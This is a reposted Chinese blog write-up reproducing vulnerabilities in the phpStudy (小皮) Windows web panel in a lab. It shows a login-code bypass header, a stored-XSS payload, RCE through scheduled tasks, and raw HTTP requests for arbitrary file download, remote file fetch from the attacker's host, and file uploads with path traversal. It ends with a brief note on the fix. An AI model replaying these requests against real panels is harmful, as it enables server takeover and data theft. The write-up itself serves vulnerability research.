小皮Windows web面板漏洞详解-转载

于 2024-09-19 16:54:16 发布
阅读量205 收藏
点赞数
文章标签: windows php
原文链接:https://www.cnblogs.com/hetianlab/p/17262290.html
版权 

        </h1>
        <div class="clear"></div>
        <div class="postBody">
                <div id="cnblogs_post_description" style="display: none">
    
    PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 小皮 Windows web 面板存在存储型 xss 漏洞,结合后台计划任务即可实现 RCE。
</div>

漏洞简介

  PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多项服务器管理功能。小皮 Windows web 面板存在存储型 xss 漏洞,结合后台计划任务即可实现 RCE。

影响版本

01.png
  因为我一边测试一边写文章,但是我发现下载下的新版本的已经添加了过滤,但是并没有更新日志。

环境搭建

  从官网下载 小皮 windows 面板安装包

  https://www.xp.cn/windows-panel.html

  ​image

  ​image

  安装完成后会有一个初始信息文本,记录了小皮面板的登录地址以及账号密码。

  ​image

  ​image

漏洞复现

绕过随机码

  我们注意到小皮面板后台默认开放在 9080 端口,后台登录 url 地址中会存在一个随机码,不添加随机码时返回信息为 404。

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

  ​image

  在程序中全局搜索和 404 相关的字样定位到 service/httpServer/Workerman/WebServer.php

  ​image

  当添加请求头 X-Requested-With: XMLHttpRequest 就可以绕过随机码。

  ​image

  ‍

存储型 XSS

  我们在用户登录处的用户名插入弹窗 XSS 代码 验证是否存在漏洞。

<script>alert("xss")</script>

  ​image

  ​image

  利用正确的用户名密码登录查看。

  ​image

  我们发现成功的触发了存储型 xss。

  我们查看登录时的数据包

  ​image

  ​service/app/account.php

  ​image

  ​\Account::login

  ​image

  ​\Socket::request

  ​image

  ‍

  将信息保存起来,登录平台后会自动获取一次日志信息。

  ​image

  ​service/app/log.php

  ​image

  ‍

后台计划任务

  我们注意到后台有计划任务模块。

  ​image

  所以可以直接通过构造计划任务实现 RCE。

  添加任务 -> 添加 shell 脚本 -> 构造 shell 脚本内容 -> 执行 shell 脚本

  ​image

  ‍

  ​image

  ​image

  ​image

  ​image

  ​image

  成功执行命令。

  结合原本的存储型 XSS,可以直接获取管理员的 Cookie 值然后实现后台计划任务命令执行,或者直接通过 js 文件实现类似 CSRF + 后台计划任务命令执行。

任意文件下载

  构造数据包

GET /service/app/files.php?type=download&file=L3Rlc3QudHh0 HTTP/1.1
Host: 192.168.222.139:9080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.222.139:9080/C292CA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211
Connection: close

  file 的值是 base64 编码后的 /test.txt 成功读取文件内容。

  ​image

  ​image

  service/app/files.php

  ​image

  文件下载通过 get 获取文件名,通过 base64 解码获取,没有校验,所以可以实现任意文件下载。

任意代码执行

  构造数据包

POST /service/app/files.php?type=download_remote_file HTTP/1.1
Host: 192.168.222.139:9080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.222.139:9080/C292CA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
​
url=aHR0cDovLzE5Mi4xNjguMjIyLjE6ODAwMC8xLnR4dA==&download_to_file_folder=&newfilename=testing.txt

  url 是 base64 编码的 http://192.168.222.1:8000/1.txt

 python2 -m SimpleHTTPServer 8000   #在本地开启 http 服务

  ​image

  ​image

  ​image

  ​service/app/files.php

  ​image

  通过 url 获取远程的下载地址,download_to_file_folder 指定下载文件文件夹,newfilename 指定保存文件的文件名。

任意文件上传

  构造数据包

POST /service/app/files.php?type=file_upload HTTP/1.1
Host: 192.168.222.139:9080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.222.139:9080/C292CA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0tFhmmng2vwxftT
Content-Length: 288
​
------WebKitFormBoundaryE0tFhmmng2vwxftT
Content-Disposition: form-data; name="file_path"
​
/
------WebKitFormBoundaryE0tFhmmng2vwxftT
Content-Disposition: form-data; name="file"; filename="testing1.txt"
Content-type: image/jpg
​
qweqwe
------WebKitFormBoundaryE0tFhmmng2vwxftT--

  ​image

  ​image

  ​service/app/files.php

  ​image

任意文件上传二

  构造数据包

POST /service/app/files.php?type=save_file_contents HTTP/1.1
Host: 192.168.222.139:9080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.222.139:9080/C292CA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
​
file_path=/&file_name=test2.txt&txt_file_contents=qwerqwer

  ​image

  ​image

  ​service/app/files.php

  ​image

  根据通过 post 传入的值 file_path 指定保存文件目录 file_name 指定文件保存名字 txt_file_contents 指定文件保存内容,未作任何过滤,可实现任意文件上传。

任意文件上传三

  构造数据包

POST /service/app/databases.php?type=file_add HTTP/1.1
Host: 192.168.222.139:9080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.222.139:9080/C292CA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9c53f8f8c903d9412a3f0211
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0tFhmmng2vwxftT
Content-Length: 312
​
------WebKitFormBoundaryE0tFhmmng2vwxftT
Content-Disposition: form-data; name="parent_dir"
​
../../../../../../../../
------WebKitFormBoundaryE0tFhmmng2vwxftT
Content-Disposition: form-data; name="file"; filename="testing2.txt"
Content-type: image/jpg
​
qweqwe
------WebKitFormBoundaryE0tFhmmng2vwxftT--

  ​image

  ​image

  ​service/app/databases.php

  ​image

漏洞修复

  在登录处添加了校验。

  ​image

  对传入的文件名的长度进行校验,同时对传入的字符串进行了 htmlspecialchars​ 处理。

原文:https://www.cnblogs.com/hetianlab/p/17262290.html

Luke_ekuL
关注
漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5610
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8747
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
小皮面板rce漏洞
weixin_61785633的博客
03-31 462
Linux也有不少规则,我们如果就按这种写法就会出现报错,不过我们却可以用双引号闭合,它只会把双引号所包含的数据写进文件中。这种方式,不过这也没关系,因为我们知道其实$_POST[]里面也有不用引号闭合的方式,那就是输入数字,变成$_POST[123],ok这下就修改完成了,后面在改改文件所在位置就行了,别文件传进去了,却访问不到木马文件。这就是我们当时登录时,所留下的记录,本来可以通过这个日志,知道有谁尝试登录过我们的小皮面板,但我们输入的js代码,会被它解析并运行,这就导致了xss漏洞
小皮nginx解析漏洞
qq_40806924的博客
09-03 452
一、Phpstudy(小皮面板)简介: PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。 二、漏洞简介: 自从2019年Phpstudy爆出的后门事件已经过去一段时间了,期间也没有爆出过什么漏洞,并且现在Phpstudy(小皮面板)已经改版了,这次爆出的漏洞是nginx的解析漏洞,也就是存在已久的/xx.php解析漏洞 PHPstudy(小皮模板存在ngin
小皮Windows web面板漏洞详解
蚁景网安学院
03-27 963
PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。 小皮 Windows web 面板存在存储 xss 漏洞,结合后台计划任务即可实现 RCE。
phpstudy小皮Windows面板RCE漏洞
今天是几号的博客
04-01 730
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。
IIS6.0 CVE-2017-7269漏洞:远程利用与本地提权详解
在网络安全领域,IIS (Internet Information Services) 是微软公司提供的一个用于Windows操作系统的Web服务器软件。IIS6.0版本在2017年被发现存在一个名为CVE-2017-7269的安全漏洞,该漏洞允许攻击者通过WebDAV服务...
admix - windows hosting control panel-开源
04-25
同时,这也意味着admix可能提供了对经典IIS(Internet Information Services)版本的支持,这是Windows Server上常见的Web服务器软件。 **标签:** "开源软件" 这个标签强调了admix的开源属性。开源软件的一大优势...
宝塔面板详尽指南:安装、管理与高级功能详解
宝塔面板手册是一份详尽的指南,针对Web开发者和运维人员在管理和优化服务器环境时可能遇到的问题和操作步骤。这份文档涵盖了从基础环境配置到高级功能的全面介绍,旨在帮助用户轻松上手并提升运维效率。 首先,...
Windows Server 2003 IIS配置与管理详解:动态Web应用与网站发布
Windows Server 2003是一款重要的网络服务器操作系统,其中集成的IIS(Internet Information Server)6.0为网络应用提供了丰富的功能和管理工具。本节将深入探讨IIS服务器配置与管理的关键知识点。 首先,IIS作为一...
网安复现系列:phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
weixin_54626591的博客
05-06 242
phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
phpstudy_小皮面板XSS到RCE
RestoreJustice的博客
03-23 660
phpStudy小皮面板用户登录日志存在存储XSS漏洞,利用存储XSS攻击者可以通过JS调用面板中的计划任务执行系统命令。
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1563
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
漏洞复现】phpStudy 小皮 Windows面板 存在RCE漏洞
最新发布
xt350488的博客
07-26 610
如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。这个时候我们再去访问这个php木马,这个时候就可以直接使用【蚁剑】连接,连接就不演示了(图不小心删了)此时你会发现你访问了这个php, 自动下载了这个文件,并没有执行,说明是纯静态的网页,我们也就使用。这个时候我们去网站后台看php版本,没有选择,选择指定的版本并保存就好。此时再输入正确的密码,成功弹窗。
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 7万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
PHPSTUDY xss+csrf RCE漏洞
m0_63028223的博客
02-08 579
产生的原因是,小皮面板管理后台会显示登录信息,会将用户登录失败的信息也显示出来,且未进行任何过滤。而且小皮面板有一个计划任务的功能,可以实现命令执行因此存在rce漏洞。最近小皮面板爆出来一个高位的RCE漏洞,跟风赶紧来复现一下。在用户名输入框输入xss测试语句,密码随便填登录。安装成功会弹出一个”小皮面板初始信息.txt“安装小皮面板,下载完安装包后傻瓜式一键安装。起一个http服务,构造csrf poc。在用户登录框插入xss payload。
小皮面板 phpstudy的坑
S_ZaiJiangHu的博客
05-14 1170
1、composer 1先在phpstudy里安装composer 然后会显示版本过低 之后再linux系统根目录下 使用composer self-update 命令 更新composer
phpstudy(小皮)默认配置解析漏洞
BROTHERYY的博客
09-03 1206
1.官网下载小皮面板 2.本地安装 3.漏洞复现 在www目录下新建test.txt文件,写入phpinfo函数 访问test.txt文件 调入exp 修复建议: 1.等待官方升级 2.更换为Apache或者装waf进行拦截 3.将php-fpm.conf中的security.limit_extensions后面的值设置为.php ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值